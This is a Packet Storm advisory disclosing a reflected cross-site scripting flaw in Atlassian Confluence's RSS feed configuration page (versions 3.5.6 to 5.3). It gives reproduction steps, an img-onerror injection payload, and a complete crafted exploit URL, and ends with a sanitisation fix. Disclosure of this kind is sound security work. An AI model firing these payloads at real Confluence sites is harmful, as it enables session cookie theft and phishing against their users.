Atlassian Confluence 5.3 Cross Site Scripting

2013-08-07T00:00:00
ID PACKETSTORM:122717
Type packetstorm
Reporter Muhammad Waqar
Modified 2013-08-07T00:00:00

Description

                                        
                                            `Atlassian Confluence, the Enterprise Wiki Reflected XSS  
  
Details  
==============================================================================  
Product: Atlassian Confluence 3.5.6 till 5.3(latest version), the Enterprise Wiki   
Security-Risk: Critical  
Remote-Exploit: yes  
Vendor-URL: http://www.atlassian.com  
Advisory-Status: Not Published  
  
Credits  
==============================================================================  
Discovered by: Muhammad Waqar   
  
Affected Products:  
==============================================================================  
Atlassian Confluence 3.5.6, the Enterprise Wiki till latest version Atlassian Confluence 5.3  
  
  
Description  
==============================================================================  
It's a wiki. You can use it to collaborate on writing and sharing content with your team.  
  
More Details  
==============================================================================  
I have discsovered a Reflected Cross site scripting (XSS) inside  
Atlassian Confluence, the Enterprise Wiki ,   
the vulnerability can be easily exploited and can be used to steal cookies,  
perform phishing attacks and other various attacks compromising the security of a  
user.  
  
Proof of Concept  
==============================================================================  
Follow below steps to reproduce:  
  
Navigate to this link http://www.example/dashboard/configurerssfeed.action  
  
Now you see RSS feed creation options  
  
Select any options you want You can see "Advanced Options" click on it and in the input fields put my XSS payload that is  
"><img src=x onerror=alert(9);>  
  
Now click on "Create RSS Feed", it will navigate to another page where you see your inserted javascript executed.  
  
  
Exploit  
==============================================================================  
Created Feed can be use any where and does not need any sort of authentication so it can be easy for cookie stealing and other attacks.  
  
http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&  
types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=  
&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed  
  
Note: This exploit works in FireFox/Opera.  
  
Solution  
==============================================================================  
Input provided by the user is not properly sanitized while posting it so it should be sanitized.  
  
  
--   
Regards,  
Muhammad Waqar  
`